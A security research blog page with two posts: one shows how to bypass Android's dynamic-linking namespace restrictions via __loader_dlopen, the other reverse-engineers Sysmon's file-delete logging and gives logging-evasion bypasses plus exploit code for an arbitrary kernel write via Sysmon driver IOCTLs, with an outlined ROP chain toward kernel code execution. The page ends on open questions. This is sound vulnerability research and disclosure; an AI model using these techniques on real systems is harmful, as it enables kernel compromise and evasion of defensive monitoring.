undev.ninja

Unrestricting Android Native Dynamic Library Linking

NtRaiseHardError — Thu, 29 Aug 2024 14:31:12 GMT

Introduction

Hacking around Android sometimes requires getting your hands dirty at the native level. And while I was on one such escapade, I discovered that Android has a tendency to make things quite restrictive with what you can do or interact with on the system. Rightfully so, perhaps, as they document on their developer website that changes from Android 7.0 start restricting access to dynamically linking against non-NDK libraries for stability reasons. The exact level of restriction on certain libraries vary between different API levels as they show in the following diagram.

Native dynamic library linking restrictions based on API level

Well, this is troublesome for the things I want to do so I had to investigate further. There weren't many helpful references online for bypassing these restrictions and only this relatively old (2019) Quarkslab post on Android Runtime Restrictions Bypass gave some idea around how it would be possible. It seems quite involved but there is a simpler workaround without tampering with any internal data structures - or so I think. This is a short post on how it's possible to bypass these restrictions ~~and definitely not stealing from Frida's codebase~~.

Android `dlopen`

Android dlopen is quite different from the base Linux implemention in that it gets the namespace of the calling function's module and checks it against the namespaces of the target library to open. To do this, the dlopen function gets an additional argument of the return address (rsp) and passes it to void* __loader_dlopen(const char* filename, int flags, const void* caller_addr).

dlopen:
	jmp    qword ptr [rip + 0xc762] 
	push   0x15                     
	jmp    0x136320                 


dlopen:
	mov    rdx, qword ptr [rsp]     
	jmp    0x41a0                     ; symbol stub for: __loader_dlopen


__loader_dlopen:
	jmp    qword ptr [rip + 0x3f8a] 
	push   0x1                      
	jmp    0x4180                   


__dl___loader_dlopen:
	push   rbp                      
	push   r15                      
	push   r14                      
	push   rbx                      
	push   rax

dlopen passing the return address to __loader_dlopen

In do_dlopen, it will use the caller address to get the calling module's namespace.

void* do_dlopen(const char* name, int flags,
                const android_dlextinfo* extinfo,
                const void* caller_addr) {
  std::string trace_prefix = std::string("dlopen: ") + (name == nullptr ? "(nullptr)" : name);
  ScopedTrace trace(trace_prefix.c_str());
  ScopedTrace loading_trace((trace_prefix + " - loading and linking").c_str());
  soinfo* const caller = find_containing_library(caller_addr);
  android_namespace_t* ns = get_caller_namespace(caller);
  
  ...
}

Start of do_dlopen getting the namespace of the calling module

There is a list of soinfo data structures that contain information about each loaded module, some of which are the module's base address, its size in memory, and its primary namespace.

struct soinfo {
#if defined(__work_around_b_24465209__)
 private:
  char old_name_[SOINFO_NAME_LEN];
#endif
 public:
  const ElfW(Phdr)* phdr;
  size_t phnum;
#if defined(__work_around_b_24465209__)
  ElfW(Addr) unused0; // DO NOT USE, maintained for compatibility.
#endif
  ElfW(Addr) base;
  size_t size;

#if defined(__work_around_b_24465209__)
  uint32_t unused1;  // DO NOT USE, maintained for compatibility.
#endif

  ElfW(Dyn)* dynamic;

#if defined(__work_around_b_24465209__)
  uint32_t unused2; // DO NOT USE, maintained for compatibility
  uint32_t unused3; // DO NOT USE, maintained for compatibility
#endif

  soinfo* next;

...

  // version >= 3
  std::vector dt_runpath_;
  android_namespace_t* primary_namespace_;
  android_namespace_list_t secondary_namespaces_;

...

The find_containing_library function will enumerate the list of soinfo to find the module's soinfo by checking if the caller address lies within the module's address range. The head of this list is a global variable called solist which can be obtained using the solist_get_head function.

soinfo* find_containing_library(const void* p) {
  // Addresses within a library may be tagged if they point to globals. Untag
  // them so that the bounds check succeeds.
  ElfW(Addr) address = reinterpret_cast(untag_address(p));
  for (soinfo* si = solist_get_head(); si != nullptr; si = si->next) {
    if (address < si->base || address - si->base >= si->size) {
      continue;
    }
    ElfW(Addr) vaddr = address - si->load_bias;
    for (size_t i = 0; i != si->phnum; ++i) {
      const ElfW(Phdr)* phdr = &si->phdr[i];
      if (phdr->p_type != PT_LOAD) {
        continue;
      }
      if (vaddr >= phdr->p_vaddr && vaddr < phdr->p_vaddr + phdr->p_memsz) {
        return si;
      }
    }
  }
  return nullptr;
}

Using the soinfo, it will get its primary namespace.

static android_namespace_t* get_caller_namespace(soinfo* caller) {
  return caller != nullptr ? caller->get_primary_namespace() : g_anonymous_namespace;
}

And somewhere down the call hierarchy, if the calling module's namespace is incompatible with the libary's, then the loader will reject the request.

Bypassing Restrictions

A namespace is obviously compatible with itself - I hope! So to get the namespace of the library that you want to load, the solution is blindingly trivial: pass the address of the library to __loader_dlopen's caller_addr argument. An unrestricted dlopen would directly call __loader_dlopen which means that it has to be found through parsing its symbol in linker64. Procfs can be used to get the initial information.

Here is code to parse the symtab symbols to find __loader_dlopen and then using it as an unrestricted dlopen.

uint64_t linker64_base = ...;
const ElfW(Sym)* ssym = nullptr;
size_t ssym_size = 0;
const char* sstr_table = nullptr;
void*(*unrestricted_dlopen)(const char*, int, void*) = nullptr;

// Get the string table and symbol headers.
for (ElfW(Half) i = 0; i < ehdr->e_shnum; i++) {
    if (shdr[i].sh_type == SHT_SYMTAB) {
        ssym = reinterpret_cast(file + shdr[i].sh_offset);
        const ElfW(Sym)* ssym_end = reinterpret_cast(
                reinterpret_cast(ssym) + shdr[i].sh_size);
        ssym_size = (reinterpret_cast(ssym_end) -
                     reinterpret_cast(ssym)) / shdr[i].sh_entsize;
        sstr_table = reinterpret_cast(file + shdr[shdr[i].sh_link].sh_offset);
    }
}

// Enumerate the string table and symbols.
for (size_t i = 0; i < ssym_size; i++) {
    if (ssym[i].st_name) {
        const char *sym_name = &sstr_table[ssym[i].st_name];
        if (std::string(sym_name).find("__dl___loader_dlopen")) 
        	// Calculate the memory address of __loader_dlopen.
        	unrestricted_dlopen = reinterpret_cast(linker64_base + ssym[i].st_value);
        }
    }
}

// Use unrestricted dlopen.
void* libart_base = ...;
void* libart_handle = unrestricted_dlopen("libart.so", RTLD_LAZY, libart_base);

Using the standard dlsym function works in the same way but once I had the handle to the library, it didn't seem to have issues about namespaces... yet.

Conclusion

It might seem like a roundabout way and unnecessary to get to an unrestricted dlopen once you already have code to parse symbols for an arbitrary library. I suppose the other solution is to modify the namespace of your own module by tampering with the solist. But it works!

I also hacked together an LLDB - why have you done this to me, Google - Python script that dumps the soinfo list and each primary namespace if you give it any (ideally solist) starting address.

#!/usr/bin/env python3

import argparse
import lldb
import re
import shlex

from pathlib import Path

SIZEOF_POINTER = 8

# [name, size, pad_size]
SOINFO_DEF = [
    ["phdr", 8, 0],
    ["phnum", 8, 0],
    ["base", 8, 0],
    ["size", 8, 0],
    ["dyn", 8, 0],
    ["next", 8, 0],
    ["flags", 4, 4],
    ["strtab", 8, 0],
    ["symtab", 8, 0],
    ["nbucket", 8, 0],
    ["nchain", 8, 0],
    ["bucket", 8, 0],
    ["chain", 8, 0],
    ["plt_relx", 8, 0],
    ["plt_relx_count", 8, 0],
    ["relx", 8, 0],
    ["relx_count", 8, 0],
    ["preinit_array", 8, 0],
    ["preinit_array_count", 8, 0],
    ["init_array", 8, 0],
    ["init_array_count", 8, 0],
    ["fini_array", 8, 0],
    ["fini_array_count", 8, 0],
    ["init_func", 8, 0],
    ["fini_func", 8, 0],
    ["ref_count", 8, 0],
    ["link_map.l_addr", 8, 0],
    ["link_map.l_name", 8, 0],
    ["link_map.l_ld", 8, 0],
    ["link_map.l_next", 8, 0],
    ["link_map.l_prev", 8, 0],
    ["contructors_called", 1, 7],
    ["load_bias", 8, 0],
    ["has_dt_symbolic", 1, 3],
    ["version", 4, 0],
    ["st_dev", 8, 0],
    ["st_ino", 8, 0],
    ["children", 8, 0],
    ["parents", 8, 0],
    ["file_offset", 8, 0],
    ["rtld_flags", 4, 0],
    ["dt_flags_1", 4, 0],
    ["strtab_size", 8, 0],
    ["gnu_nbucket", 8, 0],
    ["gnu_bucket", 8, 0],
    ["gnu_chain", 8, 0],
    ["gnu_maskwords", 4, 0],
    ["gnu_shift2", 4, 0],
    ["gnu_bloom_filter", 8, 0],
    ["local_group_root", 8, 0],
    ["android_relocs", 8, 0],
    ["android_relocs_size", 8, 0],
    ["soname", 8*3, 0],
    ["realpath", 8*3, 0],
    ["versym", 8, 0],
    ["verdef_ptr", 8, 0],
    ["verdef_cnt", 8, 0],
    ["verneed_ptr", 8, 0],
    ["verneed_cnt", 8, 0],
    ["target_sdk_version", 4, 4],
    ["dt_runpath", 8*3, 0],
    ["primary_namespace", 8, 0],
    ["secondary_namespace.head", 8, 0],
    ["secondary_namespace.tail", 8, 0],
    ["handle", 8, 0]
]

SIZEOF_SOINFO = 0 #len(SOINFO_DEF) * SIZEOF_POINTER
for i in range(len(SOINFO_DEF)):
    SIZEOF_SOINFO += SOINFO_DEF[i][1] + SOINFO_DEF[i][2]

ANDROID_NAMESPACE_DEF = [
    ["name", 8*3, 0],
    ["is_isolated", 2, 0],
    ["is_exempt_list_enabled", 2, 0],
    ["is_also_used_as_anonymous", 2, 2],
    ["ld_library_paths", 8*3, 0],
    ["default_library_paths", 8*3, 0],
    ["permitted_paths", 8*3, 0],
    ["allowed_libs", 8*3, 0],
    ["linked_namespaces", 8*3, 0],
    ["soinfo_list.head", 8, 0],
    ["soinfo_list.tail", 8, 0]
]

SIZEOF_ANDROID_NAMESPACE = 0
for i in range(len(ANDROID_NAMESPACE_DEF)):
    SIZEOF_ANDROID_NAMESPACE += ANDROID_NAMESPACE_DEF[i][1] + ANDROID_NAMESPACE_DEF[i][2]


def resolve_module_name(debugger, addr: int):
    result = lldb.SBCommandReturnObject()
    debugger.GetCommandInterpreter().HandleCommand(f"im loo -va {addr}", result)

    m = re.search(r'file = "(.*)?",', result.GetOutput())
    return m.group(1) if m is not None else None
    

def parse_std_string(process, bytes: bytes):
    try:
        return bytes.decode('utf-8').split('\0')[0].strip()
    except UnicodeDecodeError as e:
        pass

    error = lldb.SBError()
    len = int.from_bytes(bytes[0:8], 'little')
    addr = int.from_bytes(bytes[0x10:0x18], 'little')
    s_bytes = process.ReadMemory(addr, len, error)
    if not error.Success():
        print(f"Error reading memory: {error}")
        return ""

    return s_bytes.decode('utf-8').split('\0')[0].strip()


def parse_android_namespace(process, addr: int, verbose: bool):
    error = lldb.SBError()
    bytes = process.ReadMemory(addr, SIZEOF_ANDROID_NAMESPACE, error)
    if not error.Success():
        return

    # start at 1st index
    android_namespace_index = ANDROID_NAMESPACE_DEF[0][1] + ANDROID_NAMESPACE_DEF[0][2]

    for i in range(1, len(ANDROID_NAMESPACE_DEF)):
        member_size = ANDROID_NAMESPACE_DEF[i][1]
        pad_size = ANDROID_NAMESPACE_DEF[i][2]
        value = int.from_bytes(bytes[android_namespace_index:android_namespace_index+member_size], 'little')

        if verbose:
            print(f"\t[{int(android_namespace_index / SIZEOF_POINTER)}] {ANDROID_NAMESPACE_DEF[i][0]}: {hex(value)}")

        android_namespace_index += member_size + pad_size


def parse_soinfo(debugger, bytes: bytes, verbose: bool):
        process = debugger.GetSelectedTarget().process

        soinfo_index = 0
        soname = parse_std_string(process, bytes[49*8:49*8+8*3])
        
        mod_base = int.from_bytes(bytes[2*8:2*8+8], 'little')
        mod_size = int.from_bytes(bytes[3*8:3*8+8], 'little')
        print(f"Module: {soname} [{hex(mod_base)}-{hex(mod_base + mod_size)}]")
        for i in range(len(SOINFO_DEF)):
            member_size = SOINFO_DEF[i][1]
            pad_size = SOINFO_DEF[i][2]
            value = int.from_bytes(bytes[soinfo_index:soinfo_index+member_size], 'little')

            if SOINFO_DEF[i][0] == "primary_namespace":  # parse primary namespace
                error = lldb.SBError()
                bytes = process.ReadMemory(value, 8*3, error)
                if error.Success():
                    name = parse_std_string(process, bytes)
                    print(f"[{int(soinfo_index / SIZEOF_POINTER)}] {SOINFO_DEF[i][0]}: {name} [{hex(value)}]")
                else:
                    print(f"[{int(soinfo_index / SIZEOF_POINTER)}] {SOINFO_DEF[i][0]}: [{hex(value)}]")

                parse_android_namespace(process, value, verbose)
            elif verbose:
                print(f"[{int(soinfo_index / SIZEOF_POINTER)}] {SOINFO_DEF[i][0]}: {hex(value)}")

            soinfo_index += member_size + pad_size
            
        if verbose:
            print()


def enum_solist(debugger, command, result, dict):
    comm_args = shlex.split(command)

    desc = """Enumerate and print information of the solist."""
    parser = argparse.ArgumentParser(
        description=desc,
        prog='enum_solist'
    )
    parser.add_argument(
        'address',
        help='address of an solist'
    )

    parser.add_argument(
        '-v',
        "--verbose",
        action='store_true',
        help='verbose outptu of soinfo structure'
    )

    try:
        args = parser.parse_args(comm_args)
    except Exception as e:
        print(f"Failed to parse args: {e}")
        return

    start_addr = int(args.address, 0)

    target = debugger.GetSelectedTarget()
    if not target:
        print("Error: invalid target", file=target)

    process = target.process
    if not process:
        print("Error: invalid process", file=result)

    error = lldb.SBError()

    curr_soinfo_addr = start_addr
    while curr_soinfo_addr != 0:
        bytes = process.ReadMemory(curr_soinfo_addr, SIZEOF_SOINFO, error)
        if not error.Success():
            print(f"Error: {error.GetCString()}", file=result)
            return
        
        parse_soinfo(debugger, bytes, args.verbose)
        curr_soinfo_addr = int.from_bytes(bytes[5*8:5*8+8], 'little')
        

lldb.debugger.HandleCommand(
    "command script add -f enum_solist.enum_solist enum_solist")
print("A new command called 'enum_solist' was added, type 'enum_solist --help' for more information.")

Sysmon Internals - From File Delete Event to Kernel Code Execution

NtRaiseHardError — Wed, 27 Dec 2023 12:19:00 GMT

Introduction

On April 2020, Mark Russinovich announced the release of a new event type for Sysmon version 11.0: event ID 23, File Delete. As indicated by the name, it logs file delete events that occur on the system. In addition to this, another functionality came alongside allowing files marked for deletion to be archived, enabling defenders to track tools being dropped by malware to better understand the actor's capabilities and develop signatures. This article will discuss the internals of Sysmon version 11.11's to gain insight into how it operates and its limitations. I have briefly checked Sysmon version 12.0 as it was released (September 17, 2020) during the writing of this article and the code for this event looks almost identical so the information should still be mostly relevant.

Before beginning the article, a huge thank you to Samir for the collaborative effort on this journey.

File Delete Conditions

Let's first understand the conditions for which the file delete event will be triggered. The file events are handled almost entirely by the SysmonDrv.sys driver through the minifilter component. Specifically, it monitors for three I/O request packets (IRP) IRP_MJ_CREATE, IRP_MJ_CLEANUP, and IRP_MJ_WRITE for file creates, complete handle closes (reference count on a file object reaching zero), and writes respectively.

IRP_MJ_CREATE

The purpose of this IRP in the context of file deletes is to handle two situations: file overwrites and file deletes using the FLAG_FILE_DELETE_ON_CLOSE option.

File overwrite versus FLAG_FILE_DELETE_ON_CLOSE

Sysmon will check first whether the file was opened with FLAG_FILE_DELETE_ON_CLOSE, and if it is, the configuration's filter rules will be matched against. If the conditions are met, the delete event will be created and the file will be archived in the IRP_MJ_CLEANUP request when all the handles to the file are closed.

On the other hand, if the file already exists and is being opened with overwrite intent (disposition value is either FILE_OVERWRITE or FILE_OVERWRITE_IF), the driver will attempt to open the file with FltCreateFile. If the function fails with STATUS_OBJECT_NAME_NOT_FOUND, the file doesn't exist and Sysmon will pass it on to be handled as a file create event. Otherwise, if it returns successfully, the target file exists and will be archived immediately, creating the delete event in tandem.

IRP_MJ_CLEANUP

As mentioned before, this request is sent when all of the referenced handles to a file have been closed. Sysmon handles this request by checking the DeletePending flag in the file object and archiving the file if it's set. In the case of FLAG_FILE_DELETE_ON_CLOSE, Sysmon will explicitly set the file's delete disposition to true using FltSetInformationFile with FileDispositionInformation before checking the DeletePending flag.

File is archived if DeletePending is set

IRP_MJ_WRITE

Sysmon also considers file content overwrites instead of just classic file deletes. To meet this condition, the write must originate from user mode, the write size must be greater than or equal to the size of the target file and the write should start at the zeroth offset.

File write should start at offset 0 and be greater than or equal to the file size

Sysmon will then read the first byte of the file before iterating through each byte of the buffer that will be written. To trigger the file archiving and delete event, all of the bytes must match the first recorded byte. Sysmon refers to this as shredding where all bytes of the overwrite are the same, e.g. AAAAAAA....

There is one more condition under IRP_MJ_WRITE which triggers the archive and delete event however, I was unable to trigger or trace the conditions required. Perhaps this would be an upcoming feature?

Internals

Now that the conditions of file delete events have been covered, let's investigate the implementation details.

File Delete Requirements

The first function to cover is one I call CheckAndQueueFileDeleteEvent and its main purpose is to check if the target file should be archived and if a delete event should be logged. It achieves this in several ways with a few initial checks. If any of the following conditions are met, the file delete event will be bypassed:

The operation is made by the registered service process (should be Sysmon64.exe),
The delete event was not set in the configuration,
The target file is a device or directory,
The file is empty,
The file's parent directory is the archive directory.

After these initial checks, the function will retrieve the file's extension using FltParseFileNameInformation and also check if the file is an executable by using a few FltReadFile calls to read the MZ and PE signatures at offset 0 and 0x3C respectively. These values are returned back to the caller along with the image file name responsible for the operation.

Checking for PE executable signatures

Finally, it makes a call to a function I labelled QueueFileDeleteEvent to perform a final check if the file should be archived and logged.

Reporting File Delete Events

The following represents the proprietary file delete event structure:

typedef struct _FILE_DELETE_EVENT {
	/*   0 */ ULONG Id;          // 0xF0000000 for file delete.
	/*   4 */ ULONG Size;        // Struct size.
	/*   8 */ PVOID Unk1;
	/*  10 */ PVOID Unk2;
	/*  18 */ HANDLE ProcessHandle;
	/*  20 */ PKSYSTEM_TIME SystemUtcTime;
	/*  28 */ ULONG HashMethod;
	/*  2C */ BOOLEAN IsExecutable;
	/*  30 */ ULONG SidLength;
	/*  34 */ ULONG ObjectNameLength;
	/*  38 */ ULONG ImageFileNameLength;
	/*  3C */ ULONG HashLength;
	/*  40 */ WCHAR StatusString[256];
	/* 240 */ PEPROCESS ServiceProcessHandle;	// Actually a PEPROCESS object.
	/* 248 */ PKEVENT Event;
	/* 250 */ PBOOLEAN IsArchivedAddress;
	/* 258 */ // User SID.
	/* xxx */ // Object name.
	/* xxx */ // Image file name.
	/* xxx */ // File hash.
} FILE_DELETE_EVENT, * PFILE_DELETE_EVENT;

File delete event structure

The event is allocated and set in QueueFileDeleteEvent. But besides the obvious purpose of reporting file delete event data, it has another important, secondary purpose. The tenth argument to this function is a pointer that represents the boolean value of whether the target file should be archived. Although this pointer is optional, if it is a valid, non-zero value, this function serves to pass the event data to Sysmon64.exe via an event queue to be checked against the filter conditions provided in the configuration file.

Valid tenth argument

This explains the existence of the Event, IsArchivedAddress, and the ServiceProcessHandle members of the FILE_DELETE_EVENT structure. After intialising these values and the structure, the event is queued in a function I labelled QueueEvent and the thread is blocked using KeWaitForMultipleObjects waiting on either the Event or the Sysmon64.exe process.

Thread blocking after queuing file delete event

To understand this further, we need to know how events are reported from the driver to Sysmon64.exe.

QueueEvent

Sysmon utilises a doubly linked list to queue up events. In this article, I will refer to it as g_EventReportList. This function is relatively straightforward, if the event size is not greater than 0x3FCB8 + 0x348 (40000) it will be appended to g_EventReportList, otherwise, an incorrect event size error will be created. Since we are not concerned about the error event, we'll skip it for brevity.

An allocation for a new data structure is created to wrap the event argument:

typedef struct _EVENT_REPORT {
    /*  0 */ LIST_ENTRY ListEntry;
    /* 10 */ ULONG EventDataSize;
    /* 18 */ PVOID EventData;
} EVENT_REPORT, *PEVENT_REPORT;

The pointer to the event is pointed to by EventData and its size is stored in EventDataSize. After filling this structure, the EVENT_REPORT is appended in g_EventReportList if the number of entries is less than 50000. If there are 50000 entries, the first item in the queue is removed and deallocated.

Allocating and appending new event to g_EventReportList

Retrieving Events

Once events are queued, Sysmon64.exe can read them one by one through the driver's device control dispatch with the I/O control code 0x83400004.

Reading the first event on the queue through the device control dispatch

In the context of the file delete event, Sysmon64.exe will check for a valid Event member.

Sysmon64.exe checking for valid Event member

If it's valid, a filter check will be performed to determine if the target file object should be archived and a file delete event launched. The following data structure will be initialised and sent to the driver:

typedef struct _SET_ARCHIVED_INFO {
    /*  0 */ BOOLEAN IsArchived;
    /*  8 */ PEPROCESS ServiceProcessHandle;	// Service process.
    /* 10 */ PKEVENT Event;
    /* 18 */ PBOOLEAN IsArchivedAddress;
} SET_ARCHIVED_INFO, *PSET_ARCHIVED_INFO;

The IsArchived value is set depending on the return value of the function that checks for filter matching. Using DeviceIoControl, Sysmon will send the above structure back to the driver with the 0x83400010 I/O control code.

Sysmon64.exe responding with whether the file should be logged

Back in the driver's device control dispatch, the value in IsArchivedAddress will be set to IsArchived (!) before signalling the event to unblock QueueFileDeleteEvent.

Device control dispatch setting IsArchived value and signalling QueueFileDeleteEvent's wait

Once QueueFileDeleteEvent is signalled and unblocked, it will return the IsArchived value back through the tenth argument which is then returned again from CheckAndQueueFileDeleteEvent.

The return value is used in two locations: the IRP_MJ_CREATE with FLAG_FILE_DELETE_ON_CLOSE and in the ArchiveFile function. The former triggers the file delete event and archiving in the IRP_MJ_CLEANUP request by setting the CompletionContext value to 1 so that it can be handled in the minifilter's post operation.

Notifying post operation to handle FLAG_FILE_DELETE_ON_CLOSE files

The post operation routine simply allocates and sets a stream handle context with a size of two bytes. If the CompletionContext value is 1, the stream handle context will be set to the value of 0.

In post operation, set stream handle context to 0 if CompletionContext is 1

When the IRP_MJ_CLEANUP request is sent on handle close, it will check the stream handle context for 0 and set the target file's delete disposition.

Setting delete disposition if the stream handle context value is 0

File Archiving

When CheckAndQueueFileDeleteEvent returns to indicate that the file delete event should be logged, the ArchiveFile function will perform a second round of checks that must be passed if the target file should be archived. Using the subroutine that I have called GetFileInfo, Sysmon queries the state of the file for information such as the file's hash, the first byte, if the file is the same repeated byte (shredded), and if "kernel crypto" is supported - it should always be. In addition to this, ArchiveFile also queries for the available disk space. The target file will not be archived if any of the following is true:

The file is shredded,
"Kernel crypto" is not supported,
The remaining disk space is less than 10 MB.

If archiving is appropriate, it will call one of two functions. If the current IRP is IRP_MJ_WRITE, it will call the function I named CopyFile, else it will call the other I named RenameFile. The reason for why this happens is unknown to me. Both of these take the archive file name which is the file's hash (from GetFileInfo) and its extension (from CheckAndQueueFileDeleteEvent) that's generated by ArchiveFile.

CopyFile

This function is pretty self explanatory and simple. The size of the file is queried and a buffer created with a max size of 0x10000. The new archived file is created with FltCreateFile and chunks of the target file are copied over using FltReadFile and FltWriteFile. If, for some reason, the copy fails, Sysmon will report the error. The file delete event will be generated using QueueFileDeleteEvent specifying a NULL value for the tenth IsArchived parameter.

RenameFile

ArchiveFile will set this function as a delayed work item with which KeWaitForSingleObject is immediately called to trigger it. Unfortunately, I do not have an answer to this behaviour. Sysmon will simply rename the file from its original to the archived file name (replacing any existing file) before reporting the file delete event using QueueFileDeleteEvent specifying a NULL value for the tenth IsArchived parameter.

Bugs and Bypasses

Throughout my research of Sysmon - and to my surprise - I uncovered a few bugs and bypasses. In this section, I'll detail the findings and example implementations of how they can be abused. A special thank you to Samir for verifying these bugs as well as providing constant motivation.

File Shredding Bypass

Now that we understand how Sysmon identifies shredding and that it can archive files on such events, we can easily bypass it. Since shredding is defined by repeated bytes that fill the size of the file or greater, the solution is trivial. Just simply modifying the data overwrite with alternating or random non-repeated bytes. Even overwriting everything with the same repeated byte except the final character - obviously cannot be the same byte as the overwrite - will suffice.

Given the abundance of permutations for overwriting data, it's safe to assume that it's virtually impossible for Sysmon to detect these alternate methods. While it may be useful, I question its practicality.

File Delete and Overwrite Bypass

Sysmon has a small issue that seems to originate in the update from version 11.0 to 11.10 with the introduction of the CheckAndQueueFileDeleteEvent conditional in the specific FLAG_FILE_DELETE_ON_CLOSE case. The IoQueryFileDosDeviceName function call in CheckAndQueueFileDeleteEvent is provided to the file delete event reported to Sysmon64.exe where it is checked against the filter. However, dynamic analysis reveals that the resulting file object name is always C:. This means that the filter match will always fail unless the target file name is something like

C:

For some unknown reason, the following rule does not seem to capture the file delete event with FLAG_FILE_DELETE_ON_CLOSE:

C:

In addition to file deletes, this also works in the case of file overwrites with the FLAG_FILE_DELETE_ON_CLOSE option. Since Sysmon has precedence for this flag, targeting already existing files will never trigger the code that is supposed to perform the file overwrite check. The result is that the file archiving for overwritten files is never logged.

To demonstrate this, del on the command prompt deletes a file using the FLAG_FILE_DELETE_ON_CLOSE option. In the following image, the file creation is logged however, the file delete event isn't.

Sysmon failing to log FLAG_FILE_DELETE_ON_CLOSE file deletes

Arbitrary Kernel Write

I mentioned earlier that the Sysmon driver returns data to its service process to determine if a file delete event should be logged. The service process communicates back a boolean value to the driver which is written to a stack address. However, both the boolean value and the target stack address is controlled by the service process which effectively means that there is a write-what-where primitive from usermode.

Service Process Registration

To abuse this, we need to take over Sysmon64.exe and register our own from the perspective of the driver. To connect to a driver, usually a call to CreateFile is made with the path specifying the symbolic link to its device object. In this case, Sysmon's driver's device name is \\.\SysmonDrv.

HANDLE Device = CreateFile(
	L"\\\\.\\SysmonDrv",
	GENERIC_WRITE | GENERIC_READ,
	0,
	NULL,
	OPEN_EXISTING,
	FILE_ATTRIBUTE_NORMAL,
	NULL
);

CreateFile to open a handle to the Sysmon device

This results in the IRP_MJ_CREATE request being sent to the driver which is handled in its driver dispatch routine registered for the IRP_MJ_CREATE IRP. On examination of this code, it performs a privilege check on the requesting process to see if it has PRIVILEGE_SET_ALL_NECESSARY which effectively means we require debug privileges.

Opening handle to Sysmon's device requires debug privileges

Once a handle to the device is opened, the next step is to register the process with Sysmon. This means that Sysmon must set its global service process to that of our process. Sysmon supports the 0x83400000 I/O control code that's handled by the driver dispatch under the IRP_MJ_DEVICE_CONTROL request which can be made via the DeviceIoControl function using the handle to the device. If we follow this control code in the function I labelled DriverDispatchDeviceControl, there is a length check for the input and output buffers.

Input and output buffer length checks

The input buffer size can be either 0 or 4 but the output buffer size must be 4. If the input buffer exists, it is checked against the value 1111 (0x457) - this seems to be the version of Sysmon, in this case, it is v11.11, in Sysmon v12.0, it is 1200. If the input value is incorrect, it will return with the STATUS_REVISION_MISMATCH error and fail the registration. If the input buffer is not supplied, it will ignore the revision check so providing the input buffer is optional. The output buffer will always return the version.

DeviceIoControl(
	Device,
	0x83400000,
	NULL,	// Optionally a DWORD buffer = 1111.
	0,
	&OutputBuffer,
	sizeof(OutputBuffer),
	&BytesReturned,
	NULL
);

DeviceIoControl to register as a service process

Once this requirement has been fulfilled, the driver will register the requesting process as the service process. in its g_ServiceProcessHandle variable.

Sysmon driver registering a service process

The driver does not contain any other mechanisms like certificate checks to verify the service process so any executable is compatible.

Reading Events

To abuse the write, we need to be able to read the file delete events reported by the driver to obtain valid Event and ServiceProcessHandle values. As aforementioned, the driver supports another I/O control code, 0x83400004, which reads events from the g_EventReportList queue. The only requirement here is that the output buffer needs to be able to fit the size of the event. To be able to support all of the events, we can either dynamically resize the buffer with the returned size or we can simply allocate a buffer with the maximum event size (40000 from the QueueEvent function).

EventData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 40000 );
//
// Read events.
//
DeviceIoControl(
	Device,
	0x83400004,
	NULL,
	0,
	EventData,
	40000 ,
	&BytesReturned,
	NULL
);

Allocation and reading events from the Sysmon driver

We can use DeviceIoControl again with the handle to the Sysmon device. The output buffer will return the details of all queued events so we will have to differentiate them by their ID - this is the first member of the event structure. We are only interested in file delete events so we need to filter for 0xF0000000. The last check is if the event data contains a valid Event member (as checked by Sysmon64.exe so we will follow its convention).

Once all of the conditions have been fulfilled, we can finally send a request back to the driver to perform the write using the 0x83400010 I/O control code. The IsArchivedAddress member points to where the single IsArchived byte will be written. The Event and ServiceProcessHandle members will just be copied from the delete event that was read earlier.

if (((PEVENT_HEADER)EventData)->Id == 0xF0000000) {
	FileDeleteEvent = (PFILE_DELETE_EVENT)EventData;
	//
	// Check if Event is valid.
	//
	if (FileDeleteEvent->Event) {
		ZeroMemory(&ArchivedInfo, sizeof(SET_ARCHIVED_INFO));

		//
		// Initialise struct to write to kernel.
		//
		ArchivedInfo.Event = FileDeleteEvent->Event;
		//
		// Should be this process.
		//
		ArchivedInfo.ProcessHandle = FileDeleteEvent->ServiceProcessHandle;
		//
		// Set target address to write byte.
		//
		ArchivedInfo.IsArchivedAddress = (PBYTE)(0xDEADBEEFDEADBEEF);
		//
		// Set byte to write.
		//
		ArchivedInfo.IsArchived = 0x42;

		//
		// Send to driver.
		//
		DeviceIoControl(
			Device,
			0x83400010,
			&ArchivedInfo,
			sizeof(SET_ARCHIVED_INFO),
			NULL,
			0,
			NULL,
			NULL
		);
	}
}

Requesting SysmonDrv.sys to write a single byte to an arbitrary kernel address

It should be noted that there may be some queued events that contain a ServiceProcessHandle from Sysmon64.exe so it may take a few event reads to remove those from the queue before newer events start to contain our process's.

The result of the above example code is a bug check for writing to an invalid address.

BSOD from SysmonDrv.sys on kernel write at an arbitrary address

Arbitrary Kernel Write to Kernel Code Execution

To be able to execute code through Sysmon requires a few stars to align, some luck, and some hacks. We'll go over what we can do with an arbitrary kernel write, what issues we have to solve, what is available to us from Sysmon, and finally, how to combine everything together to create a solution that allows us to inject and execute code.

What We Have

Arbitrary kernel writes allow us to write a ROP chain into the stack, bypassing any stack cookie mitigations that might be present. This effectively allows us to gain control over the execution of code. But since the kernel is a volatile space with regards to unhandled exceptions, if we overwite too much of a target stack, we may end up destroying any critical data and potentially end up crashing the system. To be able to restore normal code execution, the solution I have come up with is to perform a stack pivot to another writable section in kernel and write the ROP chain there.

Now that there is execution control, where can the stack pivot and the other gadgets be written reliably and safely to guarantee that they are all there before execution? We can guarantee the gadgets if they are written somewhere that isn't touched such as a data section cave. For the stack pivot, we don't want to have the target function finish before it's written.

Since we want to inject and execute code, we can first start off with allocating a pool that has RWX permissions for writing and then executing the code. Windows allows allocation of a NonPagedPool (we want the page to always be available for code execution) through the ExAllocatePoolWithTag function which contains the permissions we need. This also benefits us by reducing the complexity of needing to reprotect the code section. This is relatively easy to achieve and the ROP chain would look something like so:

pop rcx; ret
NonPagedPool
pop rdx; ret
Code size
pop r8; ret
Tag
ExAllocatePoolWithTag

ROP chain to allocate RWX pool

Injecting code into the pool is trivial but this is useless if we can't read the address of the pool. And how do we get the address of ExAllocatePoolWithTag? If we can somehow read the pool address and inject code, how can we execute the code?

Problem Solving

We have the basic requirements for getting code execution but some issues stand in the way. To summarise:

How do we reliably and safely write the stack pivot to control execution?
How do we get the address of ExAllocatePoolWithTag?
Once we allocate the pool, how do we read it back in usermode?
After the code is written into the pool, how can we execute it?

